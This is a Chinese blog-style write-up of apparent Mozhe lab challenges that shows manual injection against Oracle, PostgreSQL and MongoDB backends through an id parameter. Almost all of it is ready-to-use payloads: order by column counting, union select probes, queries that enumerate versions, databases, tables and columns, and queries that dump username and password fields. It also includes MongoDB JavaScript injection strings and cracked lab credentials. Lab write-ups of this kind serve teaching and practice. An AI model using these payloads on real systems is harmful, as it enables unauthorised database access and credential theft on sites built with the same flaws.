SQL手工注入漏洞测试(Oracle数据库)
一,判断是否存在注⼊点
1.点击红色箭头
2.点击后出现这个页面看见上面有?id=1我们来判断这个注入点
3.回显报错,说明"and 1=2"语句拼接到了后端数据库查询语句当中
二,通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断当前字段数为2
new_list.php?id=1 order by 2
new_list.php?id=1 order by 3
三:获取显错点,联合查询这⾥使⽤了union select,oracle数据库与mysql数据库不同点在于它对
于字段点数据类型敏感,也就是说我们不能直接union select 1,2,3来获取显错点了,需要在字符型字段48
使⽤字符型数据,整型字段使⽤整型数据才可以。如下,两个字段都为字符型,故使⽤union select‘null’,‘null’
new_list.php?id=-1 union select 'null','null' from dual
四,查询数据库版本信息
new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
五,查询当前数据库库名
new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
六,查询数据库表名,查询表名⼀般查询admin或者user表
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
七,查询数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1) from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where rownum=1 and column_name not in 'USER_NAME') from dual
new_list.php?id=-1 union select 'null' ,(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' ) from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual
模糊搜索查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%' and column_name <> 'USER_NAME') from dual
⼋,查询数据库数据获取账号密码的字段内容
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r
ownum=1 and USER_NAME <> 'zhong'
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
九,对其数据库内的字段内容进⾏解密....进⾏后台登录
mozhe:439718
登录并提交Flag
PostGREsql⼿⼯注⼊
步骤⼀:查看是否存在注⼊点...构造Payload;回显没有显示数据,代表“and 1=2”语句拼接到了后端数据库查询语句当中...
步骤⼆:开始猜解后端收据库能够返回多少个字段..发现order by 5的时候没有数据回显,orderby 4 有回显数据,所以后端返回到前端的数据字段数为4个
new_list.php?id=1 order by 4
new_list.php?id=1 order by 5
步骤三:开始检测这4个字段当中哪些字段可以被前端显示出来且使⽤union 查询来构造Payload通过测试
new_list.php?id=1 and 1=2 union select 'null',null,null,null
无显示
new_list.php?id=1 and 1=2 union select null,'null',null,null
有显示
new_list.php?id=1 and 1=2 union select null,null,'null',null
有显示
new_list.php?id=1 and 1=2 union select null,null,null,'null'
无显示
通过测试发现只有第⼆第三个字段是前端回显数据字段。
步骤四:在这两个字段当中来查询我们想要的得到的数据。例如得到当前数据库名称和当前⽤户以及数据库的版本
new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,','),null from pg_database
爆出所有数据库
步骤五:构造Payload爆指定数据库下的表名
new_list.php?id=1 and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
步骤六:此时我们已经得到了表并开始查询字段,由于查询到的第⼆个表名带有“user”,我们就先查询它
new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
步骤七:查询到字段以后,最后⼀步就是爆出数据payload
new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg
(password,','),null from reg_users
步骤⼋:解密并得到相对应账号密码 mozhe2,mozhe1
mozhe2:1qaz2wsx
mozhe1:785576
登录并提交Flag
MongoDB⼿⼯注⼊
步骤⼀:构造回显测试
new_list.php?id=1'});return ({title:'1',content:'2
步骤二:查看数据库
new_list.php?id=1'});return({title:tojson(db),content:'2
步骤三:查看表名
new_list.php?id=1'});return({title:tojson(db.getCollectionNames()),content:'2
步骤四:查看表数据
new_list.php?id=1'});return({title:tojson(db.Authority_confidential.find() [ 1 ] ),content:'2
步骤五:解密登录
username:mozhe(账号)
password:902621(密码)
登录并提交Flag
790
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
